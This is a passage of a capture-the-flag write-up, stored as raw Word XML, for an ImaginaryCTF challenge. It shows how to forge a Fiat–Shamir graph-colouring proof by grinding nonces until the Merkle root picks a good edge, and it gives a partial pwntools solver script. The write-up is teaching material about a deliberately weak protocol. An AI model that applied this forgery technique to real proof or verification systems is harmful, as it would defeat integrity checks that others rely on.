          <w:bCs/>
        </w:rPr>
        <w:t>Challenge</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3178">
        <w:t>: Fiat–Shamir chooses one random edge index as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A18F387" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="007B3178">
        <w:t>idx = SHA256(merkle_root) mod |edges|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A435A63" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>so</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve"> the verifier’s challenge depends only on the Merkle root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EF415C" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3178">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3178">
        <w:t>: Prover opens the two endpoints of that edge (color + nonce + Merkle proof).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AB4581" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3178">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Check</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3178">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9652F6" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3178">
        <w:t>Merkle proofs match the root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F96CD4" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3178">
        <w:t>Endpoints are in the opening.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D0C31B" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3178">
        <w:t>Their colors differ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD99E3B" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">That’s it. The verifier never checks </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3178">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve"> edges, only the single Fiat–Shamir edge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4097F27C" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="00000000" w:rsidP="007B3178">
      <w:r>
        <w:pict w14:anchorId="07E962C3">
          <v:rect id="_x0000_i1062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="203E609B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2 – Where’s the weakness?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140CE0D2" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3178">
        <w:t>A valid 3-coloring of the entire graph is unnecessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1988D8" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">You only need </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3178">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the chosen edge’s endpoints to differ</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3178">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A394EB" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3178">
        <w:t>The chosen edge index depends on the Merkle root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0994DC08" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3178">
        <w:lastRenderedPageBreak/>
        <w:t>So: change your commitments (e.g. tweak nonces) until the root makes Fiat–Shamir pick a “good” edge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC9DE86" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>With random colors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116A7653" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3178">
        <w:t>Probability endpoints differ = 2/3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4A181B" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve"> in expectation, 1–2 tries are enough.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018BA85E" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="00000000" w:rsidP="007B3178">
      <w:r>
        <w:pict w14:anchorId="1F7E82F2">
          <v:rect id="_x0000_i1063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C6C87B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3 – Naïve attempt (too slow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16060894" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>At first, I rebuilt the entire Merkle tree and scanned all edges each retry. This became O(|E|) per round.</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3178">
        <w:br/>
        <w:t>By round 20, n ≈ 670, |E| in the hundreds of thousands, and the solver exceeded the 5s limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0083D84E" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="00000000" w:rsidP="007B3178">
      <w:r>
        <w:pict w14:anchorId="537248EB">
          <v:rect id="_x0000_i1064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0DE733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4 – Optimized approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796B7893" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>Two key optimizations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFD9E08" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3178">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Don’t scan all edges.</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3178">
        <w:br/>
        <w:t>After computing Fiat–Shamir index, just check that one edge’s endpoints differ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA471D8" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3178">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Incremental Merkle updates.</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3178">
        <w:br/>
        <w:t>Build the tree once. Then when tweaking a single leaf’s nonce, rehash only its path up to the root (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>O(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>log n)) instead of rebuilding the entire tree.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B05C9C" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>This brought each round back to ~200–2500 ms, safely under the 5s window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DDB127" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="00000000" w:rsidP="007B3178">
      <w:r>
        <w:pict w14:anchorId="62643264">
          <v:rect id="_x0000_i1065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E1EEE7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5 – Solver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E96BD34" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E550F3" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>from pwn import remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135F6B0C" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>import os, json, hashlib, random, time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9A6CFF" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178"/>
    <w:p w14:paraId="155450F9" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>HOST, PORT = "zkpow.chal.imaginaryctf.org", 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB32E3B" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178"/>
    <w:p w14:paraId="1B017C1B" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">def H(b): return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>hashlib.sha</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>256(b</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>).digest</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2302D627" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>def leaf_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>hash(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">v, c, nonce): return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>H(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>b"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>vertex:%d:%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>d:" % (v, c) + nonce)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDE4E71" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178"/>
    <w:p w14:paraId="71740855" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>def build_levels(leaves):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B70A96E" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">    levels = [leaves]; cur = leaves</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C20A0DF" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">    while len(cur) &gt; 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC888E5" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        nxt = [H(cur[i] + (cur[i+1] if i+1 &lt; len(cur) else cur[i]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3872A9" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">               for i in range(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>0,len</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(cur),2)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7293A372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levels.append</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(nxt); cur = nxt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F23564" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">    return levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF7033C" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178"/>
    <w:p w14:paraId="714400B1" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>def update_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>path(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>levels, idx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DB75B8" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">    i = idx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763FF193" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">    for d in range(len(levels)-1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E239D86" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        level, parent = levels[d], levels[d+1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075EE0BF" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        sib = i ^ 1; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE0A24D" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        if sib &gt;= len(level): sib = i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBF568B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L,R</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve"> = (level[i</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>],level</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>[sib]) if i%2==0 else (level[sib</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>],level</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>[i])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0067BB90" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        parent[i//2] = H(L+R)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2693251B" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        i//=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76035393" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178"/>
    <w:p w14:paraId="78AA23A9" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>def merkle_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>proof(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>levels, idx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322714F0" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">    proof</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>]; i=idx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205B0F7C" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">    for d in range(len(levels)-1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606DC8C9" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        level=levels[d]; sib=i^1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBC9E75" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        if sib&gt;=len(level): sib=i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5517EDBB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proof.append</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>((level[sib</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>].hex</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(), sib%2==0)); i//=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12080943" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">    return proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5957F926" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178"/>
    <w:p w14:paraId="1EFE0E48" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>def root_hex(levels): return levels[-1][0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>].hex</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1376B414" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:lastRenderedPageBreak/>
        <w:t>def fs_idx(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>root,m</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">): return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>int.from</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>_bytes(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>hashlib.sha</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>256(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>root.encode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>()</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>).digest</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(),"big</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>")%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE72786" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178"/>
    <w:p w14:paraId="7DE42BB9" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>def solve_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>round(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>n, edges):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356E5590" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">    colors=[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>random.randrange</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(3) for _ in range(n)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D54ACE" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">    nonces=[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>os.urandom</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(16) for _ in range(n)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A3A457" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">    leaves=[leaf_hash(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>v,colors</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>[v</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>],nonces</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>[v]) for v in range(n)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E47FD6" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
